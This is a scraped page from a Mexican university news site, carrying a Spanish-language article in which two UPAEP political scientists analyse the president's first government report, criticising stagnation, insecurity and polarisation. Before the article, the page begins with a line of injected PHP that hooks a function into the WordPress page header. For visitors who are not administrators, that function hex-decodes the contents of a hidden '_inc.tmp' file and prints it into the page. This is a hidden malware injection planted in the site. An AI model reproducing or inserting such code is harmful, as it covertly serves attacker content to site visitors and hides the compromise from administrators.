if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Analisis del Informe en Ia Upaep: El país estancado y con altos índices de inseguridad – La Opinión Universitaria La Opinión Universitaria
Menu

Analisis del Informe en Ia Upaep: El país estancado y con altos índices de inseguridad

 

+ Debe terminarse con la línea de la descalificación y la polarización de la sociedad., dice Claudia Ramón

Si observamos los datos que el propio gobierno está proporcionando a través de algunas instituciones, podemos decir que hay un estancamiento en el país, no estamos creciendo en el plano económico y se ha desincentivado la inversión, señaló la Dra. Claudia Ramón Pérez, profesora investigadora de la Facultad de Ciencia Política y Gobierno de la UPAEP, al hablar del primer Informe de Gobierno del Presidente de México.

Asimismo dijo que si bien se han generado empleos a través de programas de gobierno, pero en el sentido estricto, no son empleos formales y dependen la mayoría de los recursos que se les están dando, además de que corren el riesgo de desaparecer cuando los recursos se terminen.

El hecho de que el presidente de México esté presente en la rueda de prensa de la “mañanera”, va marcando el día a día de las notas y datos que va informando, esto hace que no haya alguna sorpresa con respecto a su primer Informe de Gobierno, explicó la Dra. Claudia Ramón Pérez.

Dijo que el presidente Andrés Manuel López Obrador, continúa con la línea de la descalificación y la polarización de la sociedad, además de contar con la mayoría en el congreso por parte del partido de Morena, porque “pudiendo haber asistido al Congreso, prefirió hacerlo en Palacio Nacional, siguiendo en ese sentido, con lo que se venía destacando de Enrique Peña Nieto”.

La Dra. Claudia Ramón enfatiza que un dato que olvida el presidente de México es que Morena es el partido que hoy tiene las divisiones más profundas y las confrontaciones al interior que han provocado también que se manifiesten en el poder legislativo.

Por su parte, el Dr. Juan Pablo Aranda Vargas, profesor investigador de la Facultad de Ciencia Política y Gobierno de la UPAEP, indicó que un país como México en donde los índices de desigualdad son altos, sí es atinado el comentario del presidente de señalar que los pobres deben ser los primeros en atender, ya que más de 50 millones de pobres no pueden pasar desapercibidos.

Pero, el problema que estamos viendo es que hacen falta datos, falta corroborar que “en efecto son los menos aventajados los que realmente se están beneficiando, los que están saliendo de la pobreza, no a través simplemente de subsidios directos, sino que de hecho hace falta darles trabajo, un trabajo productivo, capacitarlos y darles educación”, es decir, darles las herramientas para que ellos adquieran movilidad social y vayan mejorando su calidad de vida.

 

  • No comments

    Deja una respuesta

    Tweets recientes